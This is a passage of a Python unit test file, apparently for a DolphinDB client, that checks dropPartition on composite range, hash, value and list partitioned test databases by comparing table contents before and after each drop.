self.s.dropPartition(dbPath, ["2010.01.01", "[3,5]"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,[3,5])")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "[3,5]"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,[3,5])")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "[3,5]"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_hash_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,[3,5])")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[3,5]"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,[3,5])")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[3,5]"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,[3,5])")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[3,5]"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_value_drop_level1_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_value_drop_level1_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_value_drop_level2_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_value_drop_level2_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !between(id,2:4)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "[2,3,4]"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !between(id,2:4)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "[2,3,4]"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !between(id,2:4)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "[2,3,4]"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_value_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !between(id,2:4)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[2,3,4]"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !between(id,2:4)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[2,3,4]"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_value_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !between(id,2:4)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "[2,3,4]"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_list_drop_level1_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_list_drop_level1_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_list_drop_level2_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "'AMD'"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "'AMD'"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "'AMD'"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_list_drop_level2_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "['DOP','FSD']"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "['DOP','FSD']"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "['DOP','FSD']"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo2_range_list_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "['DOP','FSD']"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "['DOP','FSD']"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "['DOP','FSD']"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
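
    # Three-level COMPO partitions take up to three path elements: month range,
    # id partition, and sym list group.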
def test_dropPartition_dfs_compo3_range_hash_list_drop_level1_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_hash_list_drop_level1_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "2010.02.01"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_hash_list_drop_level2_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_hash_list_drop_level2_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,1..3)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1..3"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,1..3)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1..3"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or !in(id,1..3)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1..3"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_hash_list_drop_level3_single(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "'AMD'"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "'AMD'"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`AMD`QWE`CES)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "'AMD'"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_hash_list_drop_level3_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "['DOP','FSD']"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "['DOP','FSD']"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.02.01 or id!=1 or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["2010.01.01", "1", "['DOP','FSD']"])
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
def test_dropPartition_dfs_compo3_range_hash_list_drop_multiple(self):
dbPath = DBInfo.dfsDBName
tbName1 = DBInfo.table1
tbName2 = DBInfo.table2
# tb1 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,1..3) or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName2), origin)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "1..3", "['DOP','FSD']"], tbName1)
assert_frame_equal(loadTB(dbPath, tbName1), rs)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
# tb2 dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,1..3) or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "1..3", "['DOP','FSD']"], tbName2)
assert_frame_equal(loadTB(dbPath, tbName2), rs)
assert_frame_equal(loadTB(dbPath, tbName1), origin)
# both dropPartition
create_dfs_compo_range_hash_list_db()
origin = loadTB(dbPath, tbName1)
rs = loadTB(dbPath, tbName1, "where date>=2010.03.01 or !in(id,1..3) or !in(sym,`DOP`ASZ`FSD`BBVC)")
assert_frame_equal(loadTB(dbPath, tbName1), origin)
assert_frame_equal(loadTB(dbPath, tbName2), origin)
self.s.dropPartition(dbPath, ["[2010.01.01,2010.02.01]", "1..3", "['DOP','FSD']"])
